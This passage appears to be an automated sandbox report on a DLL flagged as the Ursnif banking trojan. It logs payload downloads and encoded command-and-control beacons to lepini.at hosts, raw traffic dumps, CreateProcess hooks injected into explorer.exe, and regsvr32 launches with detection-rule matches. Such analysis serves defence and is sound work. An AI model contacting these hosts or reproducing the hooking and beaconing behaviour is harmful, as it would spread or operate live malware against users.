5e 25 25 e6 3b 24 51 9d e8 57 11 cc 97 43 ed 62 f3 e7 14 a5 ed 3a 78 b9 0b 64 e9 9a 69 a9 ac 80 4c fb d4 7a 6c 4d bf a6 fe a8 be 6d 94 af 0e 84 13 96 c0 1f 95 3f 35 51 33 8d bf 4e 40 d7 d6 a8 5a d1 a6 ab 93 ac af 5d ed 9c 3b 0a f3 1b f8 9e 05 c0 5a 81 8e 5f a3 ff 42 38 c4 15 8e f4 c5 f4 84 12 a3 0f ae 1c 79 5f 55 04 71 ab 16 86 04 b5 26 45 c1 1e f1 0c d3 6d 93 da 34 92 07 29 0f 7d f3 b1 f0 42 0c 74 23 e1 07 09 aa 17 e3 3a 76 23 0c 27 41 95 44 1b cc c0 6c b1 67 1c 49 a3 fd 27 48 25 64 b9 21 aa 4b a5 07 b1 fe ca 41 9c 84 f4 bd 6d 51 c8 04 17 f0 51 73 39 51 2e 39 77 0f 2b f9 78 55 85 fe 06 3a 57 c8 b2 aa 51 1a bf b1 b6 f5 9c 21 0b fe 10 47 5d 37 d1 ca a3 c0 65 27 b8 4c 75 4f d1 c8 ac f3 9c 92 f6 09 86 93 59 48 bc 93 36 32 ab 8a de 24 16 3a fa cb 81 c4 5f 96 b7 ed f2 18 89 8f d0 9a 35 54 d6 57 2c 56 60 5c 98 bf 0e 12 af d4 7d 88 2e 5b 63 f9 c6 20 c6 93
                                                                                                                                                                                                    Data Ascii: 76c5CD[3I$wI0_TvfWmO]E>-xw4gQc*g~5ira{duSNN&Zn|:Unj>==M6,k5g2pb8z6R$PG6[1o@-AAOke%q <<fGG[oM/]vIl+]auJsrutOb'crtP^0sMj)cRGu]{c*),AH"85hs|B Su#)xlyP.2]Y*2Q;,wVK=V48Uun6bDFXWsMC.j8g1L ^rs/.REyM0JayC$C|+"BM":6)e*+d~(nT2lehnF<@+j\mGa|%\+op-BCDre[FB,`h%f.^%%;$QWCb:xdiLzlMm?5Q3N@Z];Z_B8y_Uq&Em4)}Bt#:v#'ADlgI'H%d!KAmQQs9Q.9w+xU:WQ!G]7e'LuOYH62$:_5TW,V`\}.[c


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                    5192.168.2.54977234.65.144.15980C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                                    Feb 15, 2021 21:27:39.873075008 CET8565OUTGET /jvassets/xI/t64.dat HTTP/1.1
                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                    Host: c56.lepini.at
                                                                                                                                                                                                    Feb 15, 2021 21:27:39.998234034 CET8567INHTTP/1.1 200 OK
                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                    Date: Mon, 15 Feb 2021 20:27:39 GMT
                                                                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                                                                    Content-Length: 138820
                                                                                                                                                                                                    Last-Modified: Mon, 28 Oct 2019 09:43:42 GMT
                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                    ETag: "5db6b84e-21e44"
                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                    Data Raw: 17 45 7e 72 ac 5b ed 66 e1 de 31 9e 70 18 b7 1a 77 c0 be b3 e2 43 ff 7c d8 16 7f 6f 35 a2 d1 a5 d2 ec 0d 0c de 58 84 1a f3 53 04 f0 65 cb 76 1f 35 85 a0 7d 1d f2 44 63 de 89 f3 f1 eb d3 60 21 68 3d 3a 93 e1 55 94 db 4c d2 f2 b4 3e 34 48 eb e8 47 7b 53 14 54 86 87 a3 d2 0d 55 0c d0 4f 6f 51 73 eb e2 f9 f4 9b f0 49 af 3d a0 bd ba 48 52 29 a2 84 33 75 9e 48 16 a7 b3 00 58 91 bf bf ea 49 85 ff c7 58 36 df 5b 13 ec c2 c6 92 56 72 82 53 68 a1 ca a8 33 3e e7 8b 8e 6f fa 4b 85 a0 7f bb 5c de 12 c3 97 40 27 18 f2 b2 95 91 d8 b7 45 cf 2a 5f 95 76 5b fc 02 c1 9d d7 e5 7f ee ec f5 a0 52 7b 4d 4d ae da 70 b4 71 95 b6 39 2e 38 47 c0 ab 5e fe cf a1 6a 5c a5 3c 8f 1b 97 0a 2a 41 5f 6e 2e 85 b4 8e 24 d6 6a 1c cb 43 8c ca 75 7d 09 57 73 3c a2 b8 0b 18 00 21 c1 f5 fc e4 2b 04 14 51 c3 36 ea 80 55 0a 28 82 e4 56 51 91 99 bf 11 ae 36 06 cd 81 44 e0 ad db 69 d6 8e 24 28 ee 4c 0d 81 69 8b 96 c0 52 cd ed ec 31 e8 7f 08 d8 ff 0a 82 4d 1d fa a0 28 3c 3f 5f 53 cb 64 ea 5d 7c c7 f0 0f 28 71 5a f4 60 b7 7b f3 e1 19 5b 7b be d1 62 af ef 2f ad 3b 22 a8 03 e7 9f 3d e5 da ca 8b 1a 9c 2c fd 76 89 a9 f7 a5 7b 6a b4 47 62 bf 64 5d 54 26 01 9a 1d 3b b0 97 db c5 c1 dd 94 52 d0 b2 77 e0 f7 00 8d c1 99 02 69 f4 b2 87 b2 0c 68 b3 9d b6 e6 a6 9f 58 b0 52 f8 5e b5 ac 1e 36 41 bd bc f9 5d 3a 2b 5a 40 60 9a 48 c1 b3 4a df cc 81 65 53 4e e4 9a 80 8b dd 8f 43 eb 11 23 73 1b 1b c1 99 89 21 94 4c a5 84 c3 13 96 ad 5d 82 20 a4 a4 3b dd 1e 43 74 c6 42 11 7a 8a f2 93 8b 7e 24 73 17 d9 c7 eb 47 18 47 41 4f a2 f1 bc 52 cc 35 f2 c2 73 3e e5 32 8a b5 c7 7c 3b d4 88 bd aa 47 48 66 2e 00 bd 3f fc 08 b4 49 98 e3 36 db f0 33 4c 40 2b cc 59 2a b5 ba 73 58 27 de a0 31 0e 6d 63 70 19 7b 5f 67 00 54 79 89 7f 42 21 df 6e 23 e1 54 43 4a 09 00 77 ac fb e4 2e a8 6d 07 21 b3 a0 98 ad 40 d2 34 64 c9 c2 62 14 7c 45 eb a0 65 98 c1 18 a1 6a af 69 0a a2 bb 50 42 96 c1 d7 02 58 6d f4 b1 15 90 f6 50 9c 6a fd d4 2e 5e a7 4a cb 67 59 63 74 77 99 de e0 c0 d5 5c 9d a7 89 1b 90 39 29 23 21 3b c4 35 f1 49 9e 67 f3 ce fe 1d 0a 67 69 06 13 13 30 ab e6 c6 f4 c9 7e 94 48 5b a1 f7 5f 27 1f 03 ac 85 e1 0e b1 bf 6e e1 1c 5a 24 cc b2 53 fd 61 58 e3 87 0b 85 9e 03 94 f6 2a bd 92 53 09 77 f8 5e d3 c9 b7 19 42 4e e6 2a 67 af 27 4e 01 de 6a fc 1e 82 0c 7e 45 7b e8 1d 97 82 9b 5c 14 96 d2 82 dd 53 15 1e 84 41 01 4f 0f 32 ac ee b7 85 96 4c e9 dc b0 42 3c 93 a6 0b a3 79 cb 7b 2c d1 21 6f c1 6a 38 48 d7 37 8f 35 b8 1d 7a e7 eb 63 bc 4e 6b b6 23 aa 9c fd 32 03 46 e2 37 47 49 c2 35 a1 48 7e 98 49 6a b4 98 e7 cb 33 dd 1a be 5a c8 ea a7 44 33 9b e3 a6 84 da 68 ec bf 93 03 88 f9 6e 02 17 a6 96 46 ad ae 25 c2 bb 97 7a 57 35 aa 0a 42 b5 c3 8a 35 af 20 1b 1a b9 c6 99 99 8a b2 b6 46 1c 70 a0 53 c2 e9 a2 e6 ad a4 8f d5 11 da 74 60 13 7c 55 4d 42 1c c6 a4 47 a8 4e 27 67 a4 37 b3 0e ca f5 b1 9a a5 de e3 07 25 55 07 ff 18 b3 17 44 8b a0 af e3 f5 ff 75 b8 f2 2b 4d 9e f9 ad 07 c0 5e d7 1b ab 81 e4 99 93 ac a9 63 2f 4e 27 18 d0 dd 29 f7 28 98 b1 c3 5e 52 9e d4 01 1b 9f ba 6d 7d 24 b8 cc 84 0e 03 07 2e 3a ba b5 ad 8b ae 57 ce 78 7b aa 0f 07 5f ee 2a 4a 6b 0d f8 40 bb 79 91 71 5d ae 1b 1d 3c bf b9 e2 9b d4 4c 6c 52 55 e3 59 22 40 9a 6f cc 9a 14 bb 63 ad 00 8f bf cd 7b ca 18 ce c6 df 21 08 86 ed 93 17 79 b7 6d 89 0c ba 64 8a 93 dd fa 1b 07 69 84 31 87 f9 ae 59 a4 f8 ed 03 62 6f 2a fa 54 99 38 81 d4 e3 dc e8 39 d4 b0 62 81 c2 49 a1
                                                                                                                                                                                                    Data Ascii: E~r[f1pwC|o5XSev5}Dc`!h=:UL>4HG{STUOoQsI=HR)3uHXIX6[VrSh3>oK\@'E*_v[R{MMpq9.8G^j\<*A_n.$jCu}Ws<!+Q6U(VQ6Di$(LiR1M(<?_Sd]|(qZ`{[{b/;"=,v{jGbd]T&;RwihXR^6A]:+Z@`HJeSNC#s!L] ;CtBz~$sGGAOR5s>2|;GHf.?I63L@+Y*sX'1mcp{_gTyB!n#TCJw.m!@4db|EejiPBXmPj.^JgYctw\9)#!;5Iggi0~H[_'nZ$SaX*Sw^BN*g'Nj~E{\SAO2LB<y{,!oj8H75zcNk#2F7GI5H~Ij3ZD3hnF%zW5B5 FpSt`|UMBGN'g7%UDu+M^c/N')(^Rm}$.:Wx{_*Jk@yq]<LlRUY"@oc{!ymdi1Ybo*T89bI


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                    6192.168.2.54977334.65.144.15980C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                                    Feb 15, 2021 21:27:49.780139923 CET8784OUTGET /api1/7SpKvNZQZWoR0wQKCmN1/KD_2BPey7M6A4sknzph/Ip3VpPOQqmnCvT_2B_2BK5/4r2K_2B3wW0f3/JdFGceR8/sN9tQwx3x3JWJ2dzvoaA_2F/7bnKlxAsYe/gSbjUWPJM3O0NeIou/EZHWrqNzUS0t/SJ53k6qr4k5/xiOJ1_2BbyKtK4/Tnf2QRNkKddPRNN_2Fkyp/65kWXGWip9M43opO/J4Nq71H0yPbyFLs/r9xzWAiWquka5b9cWG/7jyYbvLwX/YHG6XBsznTAJKxK3VHeE/SrFheeplHdah6LyL5hX/KC_2BG8oiks28NBuCaE6gf/tQuPh0 HTTP/1.1
                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0
                                                                                                                                                                                                    Host: api3.lepini.at
                                                                                                                                                                                                    Feb 15, 2021 21:27:50.445771933 CET8784INHTTP/1.1 200 OK
                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                    Date: Mon, 15 Feb 2021 20:27:50 GMT
                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                    Strict-Transport-Security: max-age=63072000; includeSubdomains
                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                    7192.168.2.54977434.65.144.15980C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                                    Feb 15, 2021 21:27:50.736696959 CET8789OUTPOST /api1/bXII_2FHb0focJwi2/NKTIw_2FgiKf/ws9atmb5xre/8ghQ36n3SNQg84/1PN9WyLcQDb7Ra3wHIhjp/FiUmpJqa00TMQIaH/_2BHj0Q4IM1ltM6/5khUyF_2BRsPcD5Q37/C_2FE9BKN/CafUcW267Vk_2FIY_2Bn/_2BcfZsnCXmPwjFlUTt/pXytrrnaXNmzXOHxla9mOU/6X7At_2B8RTFx/TPw_2FzM/jbcnoszV5Xhd9jlATPIAobN/UMGaXl3YDQ/Krg2ExScIQW_2Fg_2/BTQ5TzTymRNC/sxopWB80XHY/7SN_2FkITnVhH7/8XPMTwHoJBXOcWd_2Fyk4/T_2Bzs HTTP/1.1
                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0
                                                                                                                                                                                                    Content-Length: 2
                                                                                                                                                                                                    Host: api3.lepini.at
                                                                                                                                                                                                    Feb 15, 2021 21:27:51.290230989 CET8791INHTTP/1.1 200 OK
                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                    Date: Mon, 15 Feb 2021 20:27:51 GMT
                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                    Strict-Transport-Security: max-age=63072000; includeSubdomains
                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                    Data Raw: 37 37 0d 0a 8d 87 1d d8 f1 f6 56 18 d6 06 ac 96 e6 02 31 13 0c 4c 71 ae 76 5d 86 ad 65 61 3c 10 dd e4 a2 09 e8 e8 bc ba 5b 50 c0 53 3b 32 2b 69 39 b6 10 2a 09 d4 23 26 4d 48 07 7a d8 78 b7 5d 11 11 d6 52 f5 cc 40 24 2d 87 fe a1 d1 2a 1c d3 73 99 b2 06 b5 11 54 b0 56 46 db 3b 41 13 c7 6c ee 0c e3 85 02 bc c6 a6 c0 3d 1e e0 07 79 99 ab a6 cf 5e 3f 26 d2 73 9f 87 0d 0e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 77V1Lqv]ea<[PS;2+i9*#&MHzx]R@$-*sTVF;Al=y^?&s0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                    8192.168.2.54977534.65.144.15980C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                                    Feb 15, 2021 21:27:51.945363045 CET8792OUTGET /api1/AV8RjqvumRQ/OvLh7PdTNMKGa7/3LP4_2BG3LRcoZojWSk5u/NsORJjPn_2Fv_2B1/6Rz2NQs3_2FAyK6/XQQdYcU_2Fse_2F2j3/Zr9Hx_2Ba/98olXIGwinJCl_2FG4zm/M7DRWkrkSQ3KxF_2B9c/y19JwEmq4VBfpQCfptESLl/3GITd_2BqQxr2/SZAx9P1V/YikBhoAaQcpPJtcNJcJIY1_/2BjEuQfwCu/DUjEswX2uyguNEfAU/ZGf5P4bm4kOR/ZxxrQAreiF2/UPHWjC6fJcwkvj/jLEwRcMGH9odoyp8GuEAA/_2BQntTJU4ER5IW5/BN_2BQxL/y8vbI87 HTTP/1.1
                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0
                                                                                                                                                                                                    Host: api3.lepini.at
                                                                                                                                                                                                    Feb 15, 2021 21:27:52.335773945 CET8793INHTTP/1.1 200 OK
                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                    Date: Mon, 15 Feb 2021 20:27:52 GMT
                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                    Strict-Transport-Security: max-age=63072000; includeSubdomains
                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    HTTPS Packets

                                                                                                                                                                                                    TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                                                                                                                                    Feb 15, 2021 21:26:09.842351913 CET104.20.184.68443192.168.2.549732CN=onetrust.com, O="Cloudflare, Inc.", L=San Francisco, ST=California, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEFri Feb 12 01:00:00 CET 2021 Mon Jan 27 13:48:08 CET 2020Sat Feb 12 00:59:59 CET 2022 Wed Jan 01 00:59:59 CET 2025771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,09e10692f1b7f78228b2d4e424db3a98c
                                                                                                                                                                                                    CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Jan 27 13:48:08 CET 2020Wed Jan 01 00:59:59 CET 2025
                                                                                                                                                                                                    Feb 15, 2021 21:26:09.843595028 CET104.20.184.68443192.168.2.549733CN=onetrust.com, O="Cloudflare, Inc.", L=San Francisco, ST=California, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEFri Feb 12 01:00:00 CET 2021 Mon Jan 27 13:48:08 CET 2020Sat Feb 12 00:59:59 CET 2022 Wed Jan 01 00:59:59 CET 2025771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,09e10692f1b7f78228b2d4e424db3a98c
                                                                                                                                                                                                    CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Jan 27 13:48:08 CET 2020Wed Jan 01 00:59:59 CET 2025
                                                                                                                                                                                                    Feb 15, 2021 21:26:16.632045031 CET151.101.1.44443192.168.2.549749CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=USCN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USWed Nov 25 01:00:00 CET 2020 Thu Sep 24 02:00:00 CEST 2020Mon Dec 27 00:59:59 CET 2021 Tue Sep 24 01:59:59 CEST 2030771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,09e10692f1b7f78228b2d4e424db3a98c
                                                                                                                                                                                                    CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=USCN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USThu Sep 24 02:00:00 CEST 2020Tue Sep 24 01:59:59 CEST 2030
                                                                                                                                                                                                    Feb 15, 2021 21:26:16.747270107 CET151.101.1.44443192.168.2.549747CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=USCN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USWed Nov 25 01:00:00 CET 2020 Thu Sep 24 02:00:00 CEST 2020Mon Dec 27 00:59:59 CET 2021 Tue Sep 24 01:59:59 CEST 2030771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,09e10692f1b7f78228b2d4e424db3a98c
                                                                                                                                                                                                    CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=USCN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USThu Sep 24 02:00:00 CEST 2020Tue Sep 24 01:59:59 CEST 2030
                                                                                                                                                                                                    Feb 15, 2021 21:26:16.959656000 CET151.101.1.44443192.168.2.549751CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=USCN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USWed Nov 25 01:00:00 CET 2020 Thu Sep 24 02:00:00 CEST 2020Mon Dec 27 00:59:59 CET 2021 Tue Sep 24 01:59:59 CEST 2030771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,09e10692f1b7f78228b2d4e424db3a98c
                                                                                                                                                                                                    CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=USCN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USThu Sep 24 02:00:00 CEST 2020Tue Sep 24 01:59:59 CEST 2030
                                                                                                                                                                                                    Feb 15, 2021 21:26:16.960663080 CET151.101.1.44443192.168.2.549746CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=USCN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USWed Nov 25 01:00:00 CET 2020 Thu Sep 24 02:00:00 CEST 2020Mon Dec 27 00:59:59 CET 2021 Tue Sep 24 01:59:59 CEST 2030771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,09e10692f1b7f78228b2d4e424db3a98c
                                                                                                                                                                                                    CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=USCN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USThu Sep 24 02:00:00 CEST 2020Tue Sep 24 01:59:59 CEST 2030
                                                                                                                                                                                                    Feb 15, 2021 21:26:17.004138947 CET151.101.1.44443192.168.2.549748CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=USCN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USWed Nov 25 01:00:00 CET 2020 Thu Sep 24 02:00:00 CEST 2020Mon Dec 27 00:59:59 CET 2021 Tue Sep 24 01:59:59 CEST 2030771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,09e10692f1b7f78228b2d4e424db3a98c
                                                                                                                                                                                                    CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=USCN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USThu Sep 24 02:00:00 CEST 2020Tue Sep 24 01:59:59 CEST 2030
                                                                                                                                                                                                    Feb 15, 2021 21:26:17.081238985 CET151.101.1.44443192.168.2.549750CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=USCN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USWed Nov 25 01:00:00 CET 2020 Thu Sep 24 02:00:00 CEST 2020Mon Dec 27 00:59:59 CET 2021 Tue Sep 24 01:59:59 CEST 2030771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,09e10692f1b7f78228b2d4e424db3a98c
                                                                                                                                                                                                    CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=USCN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USThu Sep 24 02:00:00 CEST 2020Tue Sep 24 01:59:59 CEST 2030

                                                                                                                                                                                                    Code Manipulations

                                                                                                                                                                                                    User Modules

                                                                                                                                                                                                    Hook Summary

                                                                                                                                                                                                    Function NameHook TypeActive in Processes
                                                                                                                                                                                                    api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessWIATexplorer.exe
                                                                                                                                                                                                    api-ms-win-core-registry-l1-1-0.dll:RegGetValueWIATexplorer.exe
                                                                                                                                                                                                    CreateProcessAsUserWEATexplorer.exe
                                                                                                                                                                                                    CreateProcessAsUserWINLINEexplorer.exe
                                                                                                                                                                                                    CreateProcessWEATexplorer.exe
                                                                                                                                                                                                    CreateProcessWINLINEexplorer.exe
                                                                                                                                                                                                    CreateProcessAEATexplorer.exe
                                                                                                                                                                                                    CreateProcessAINLINEexplorer.exe

                                                                                                                                                                                                    Processes

                                                                                                                                                                                                    Process: explorer.exe, Module: WININET.dll
                                                                                                                                                                                                    Function NameHook TypeNew Data
                                                                                                                                                                                                    api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessWIAT7FFA9B335200
                                                                                                                                                                                                    api-ms-win-core-registry-l1-1-0.dll:RegGetValueWIAT721719C
                                                                                                                                                                                                    Process: explorer.exe, Module: user32.dll
                                                                                                                                                                                                    Function NameHook TypeNew Data
                                                                                                                                                                                                    api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessWIAT7FFA9B335200
                                                                                                                                                                                                    api-ms-win-core-registry-l1-1-0.dll:RegGetValueWIAT721719C
                                                                                                                                                                                                    Process: explorer.exe, Module: KERNEL32.DLL
                                                                                                                                                                                                    Function NameHook TypeNew Data
                                                                                                                                                                                                    CreateProcessAsUserWEAT7FFA9B33521C
                                                                                                                                                                                                    CreateProcessAsUserWINLINE0xFF 0xF2 0x25 0x50 0x00 0x00
                                                                                                                                                                                                    CreateProcessWEAT7FFA9B335200
                                                                                                                                                                                                    CreateProcessWINLINE0xFF 0xF2 0x25 0x50 0x00 0x00
                                                                                                                                                                                                    CreateProcessAEAT7FFA9B33520E
                                                                                                                                                                                                    CreateProcessAINLINE0xFF 0xF2 0x25 0x50 0x00 0x00

                                                                                                                                                                                                    Statistics

                                                                                                                                                                                                    Behavior

                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                    System Behavior

                                                                                                                                                                                                    Analysis Process: loaddll32.exe PID: 6432 Parent PID: 5628

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Start time:21:26:02
                                                                                                                                                                                                    Start date:15/02/2021
                                                                                                                                                                                                    Path:C:\Windows\System32\loaddll32.exe
                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                    Commandline:loaddll32.exe 'C:\Users\user\Desktop\NJPcHPuRcG.dll'
                                                                                                                                                                                                    Imagebase:0xc80000
                                                                                                                                                                                                    File size:121856 bytes
                                                                                                                                                                                                    MD5 hash:8081BC925DFC69D40463079233C90FA5
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Reputation:low

                                                                                                                                                                                                    Analysis Process: regsvr32.exe PID: 6448 Parent PID: 6432

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Start time:21:26:02
                                                                                                                                                                                                    Start date:15/02/2021
                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                    Commandline:regsvr32.exe /s C:\Users\user\Desktop\NJPcHPuRcG.dll
                                                                                                                                                                                                    Imagebase:0x230000
                                                                                                                                                                                                    File size:20992 bytes
                                                                                                                                                                                                    MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                    • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.395542546.00000000042F0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                    • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.328188279.0000000004F38000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                    • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                    • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.328320558.0000000004F38000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                    • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.328226726.0000000004F38000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                    • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.328337032.0000000004F38000.00000004.00000040.sdmp, Author: Joe Security
